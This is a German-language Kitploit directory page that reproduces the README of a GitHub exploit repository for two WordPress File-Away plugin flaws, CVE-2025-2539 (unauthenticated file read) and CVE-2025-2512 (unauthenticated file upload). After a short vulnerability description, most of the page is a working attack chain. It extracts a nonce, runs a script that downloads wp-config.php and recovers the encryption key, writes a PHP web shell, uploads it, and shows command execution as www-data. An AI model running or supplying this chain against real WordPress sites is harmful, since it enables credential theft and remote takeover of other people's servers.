Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/whattheslime/file-away-exploit
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstestsPayload-Entwicklung
GitHubwhattheslime/file-away-exploit

file-away-exploit

Exploit-Skripte zur Remote-Code-Ausführung für das WordPress-Plugin File-Away (CVE-2025-2512 & CVE-2025-2539)

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
file-away-exploit — Exploit-Skripte zur Remote-Code-Ausführung für das WordPress-Plugin File-Away (CVE-2025-2512 & CVE-2025-2539) | Kitploit
Webseite
Teilen

File-Away Exploit (CVE-2025-2539 & CVE-2025-2512)

📌 Zweck

Dieses Repository enthält Schwachstellendetails und Skripte, die in File-Away gefunden wurden, einem WordPress-Plugin zur Dateiverwaltung.

Dieses Plugin enthält zwei Schwachstellen, die zu Remote-Codeausführung führen können (Getestet mit File-Away 3.9.9.0.1):

  • CVE-2025-2539: Nicht authentisiertes beliebiges Lesen von Dateien
  • CVE-2025-2512: Nicht authentisiertes beliebiges Hochladen von Dateien

📖 Nicht authentisiertes beliebiges Lesen von Dateien

Das File-Away-Plugin für WordPress ist in allen Versionen bis einschließlich 3.9.9.0.1 anfällig für nicht authentisiertes beliebiges Lesen von Dateien.

Diese Schwachstelle existiert aufgrund zweier Probleme: dem Fehlen einer Authentifizierungsprüfung in der Funktion lib/cls/class.fileaway_stats.php:file_away_stats->ajax() und der Verwendung eines schwachen Verschlüsselungsalgorithmus in der Funktion lib/cls/class.fileaway_encrypted.php:fileaway_encrypted->encrypt().

Dies ermöglicht es nicht authentisierten Angreifern, beliebige Dateien zu lesen, einschließlich der WordPress-Konfigurationsdatei (wp-config.php).

📁 Nicht authentisiertes beliebiges Hochladen von Dateien

Das File-Away-Plugin für WordPress ist in allen Versionen bis einschließlich 3.9.9.0.1 anfällig für nicht authentisiertes beliebiges Hochladen von Dateien.

Diese Schwachstelle existiert aufgrund zweier Probleme: dem Fehlen einer Authentifizierungsprüfung und der mangelhaften Dateitypprüfung, beide in der Funktion lib/cls/class.fileaway_management.php:fileaway_management->upload().

Dies ermöglicht es nicht authentisierten Angreifern, beliebige Dateien hochzuladen, was zu Codeausführung führen kann.

🔍 Erkennung

Wenn das File-Away-Plugin auf der Ziel-WordPress-Instanz installiert und aktiviert ist, sollte das fileaway_stats-Nonce auf der Indexseite vorhanden sein:

root@kitploit:~
curl -sk http://127.0.0.1:8000/ | grep -E '^var fileaway_stats.*nonce\":\"([a-f0-9]+)\"};$'
root@kitploit:~
var fileaway_stats = {"ajaxurl":"http:\/\/127.0.0.1:8000\/wp-admin\/admin-ajax.php","nonce":"ff57064c96"};

🐞 Schritte zur Ausnutzung

  1. python-Anforderungen installieren:

    root@kitploit:~
    python3 -m venv venv && venv/bin/pip install httpx
    
  2. Die Schwachstelle zum beliebigen Lesen von Dateien verwenden, um die Konfigurationsdatei der WordPress-Instanz (wp-config.php) zu erhalten:

    root@kitploit:~
    venv/bin/python3 get_config.py -t http://127.0.0.1:8000
    
    root@kitploit:~
    [+] File-Away nonce:          ff57064c96
    [-] Encrypted web root:       LcZh3iec7c3vfHRt2C8=
    [-] Decoder:                  .i%B7%1Dy%F8%21%8A9%25%9Az%29%AA%BB-%BA%FC1%CB%3D5%DB~9%EB%BF%3D
    [-] Charset:                  abcdefghijklmnopqrstuvwxyz0123456789
    [+] Encryption Key:           f2379aghijklmnopqrstuvwxyz65bc410d8e
    [+] Decrypted web root:       /var/www/html
    [+] Config file downloaded:   127.0.0.1:8000_wp-config.php
    
  3. Eine PHP-Datei zum Hochladen erstellen:

    root@kitploit:~
    echo '<?php system("id"); ?>' > /tmp/exec.php
    
  4. Die verwenden, um die -Datei auf den Server hochzuladen:

Tool herunterladen
Schwachstelle zum beliebigen Hochladen von Dateien
PHP
root@kitploit:~
venv/bin/python3 file_upload.py -t http://127.0.0.1:8000 -c 127.0.0.1:8000_wp-config.php -w /var/www/html/ -f /tmp/exec.php
root@kitploit:~
[-] nonce:            4810861b18
[-] upload_nonce:     0c3f44ae83
[-] loc_nonce:        a17a2df989
[+] File uploaded:    http://127.0.0.1:8000/wp-content/exec.php

⚠️ Die Datei wird standardmäßig im Verzeichnis wp-content hochgeladen ⚠️

  • Auf die hochgeladene PHP-Datei zugreifen:

    root@kitploit:~
    curl -sk http://127.0.0.1:8000/wp-content/exec.php
    
    root@kitploit:~
    uid=33(www-data) gid=33(www-data) groups=33(www-data)